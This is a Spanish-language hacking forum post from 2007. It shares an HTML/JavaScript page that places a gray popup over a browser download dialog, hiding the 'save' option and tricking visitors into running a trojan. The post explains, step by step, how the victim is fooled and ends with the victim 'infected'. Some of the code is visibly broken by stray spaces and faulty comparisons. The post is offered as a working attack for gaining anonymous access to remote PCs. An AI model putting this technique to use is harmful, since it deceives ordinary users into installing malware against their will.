misteriso
NZ2
 
Desconectado
Mensajes: 132

misterioso
|
 |
« : 12 de Mayo de 2007, 04:42:51 » |
|
wow....tenia dias que no entraba a este maravilloso foro, por cuestiones de trabajo.....pe ro regrese con este humilde aporte
Una manera habitual de introducirse en un PC remoto de maneraanónima es conseguir que la víctima se infecte con un troyano/virus. El problema es conseguir que la víctima se infecte, para ello no habitual es sacar provecho de las vulnerabilidad es, fallos de seguridad o configuracione s defectuosas
Pero hay otra manera de incitar a la víctima a infectarse. Si la víctima es engañada, mostrandole en pantalla información modificada, que le incite a tomar decisiones (sobre bajarse algo de una web, o ejecutarlo desde la web, por ejemplo) que causan el efecto contrario a lo deseado
<html> <body onload="start()"> <script> //largo y ancho de la ventana que va a aparecer sobre el cuadro largo=300; alto=15; x=screen.width / 2; dx=20; dy=alto; //coordenadas en las que va a aparecer la ventana y=384; x1=426; //Se establece el tamaño de la web para que a ventana que //creamos siempre quede colocada exactamente donde queremos window.resizeT o(screen.width,screen.height); //Se situa la web en la esquina de arriba a la izquierda window.moveTo(0,0); //Creamos la ventana que se va a sobreponer al cuadro op=window.createPopup(); //como lo que necesitamos es un fondo gris, creamos una tabla de fondo gris,// de 1 casilla que ocupe toda la pantalla//de este fondo gris es de donde se tomará el gris que tapará //"Guardar este archivo a disco" con el ancho y alto establecidos antes s='<body><table bgcolor="#C0C0C0" width="100%" height="100%"><tr>'; s+='<td>'; s+='</td>'; s+='</tr></table></body>'; op.document.bo dy.innerHTML=s; function opmov() { x =dx; if (x = x1) { dx= -dx; } if(op.isOpen) op.hide; op.show(x,y,largo,alto,document.body); } //función que desencadena todo el proceso function start() { in1=setInterval("{opmov();}",100); } </script> </body> </html>
CONCLUSIONES: La víctima sólo verá como su pantalla se pone totalmente gris, (totalmente es totalmente) con el consiguiente mosqueo, unos segundo despues aparece una pantalla que hace "ding", extrañado, la lee mientras su pantalla sigue parpadeando levemente, y lo que lee es que la página que ha visitado contiene un archivo peligroso, como eso encaja con lo que le está pasando, decide eliminarlo antes de que sea tarde, marca la casilla, no pasa nada, posiblemente lo atribuirá al "archivo peligroso", así que vuelve a marcar, ahra si, le da aceptar, Y YA ESTÁ. Lo que pasa a continuación depende de otros factores, probablemente la víctima vea durante un instante una ventana de comandos, que desaparece, pero el resto queda todo igual. A parte de reiniciar, la manera de salir de esta pantalla es pulsando ALT+F4, repetidas veces para ir cerrando una a una las pantallas. Pero ya es demasiado tarde, la víctima está infectada
|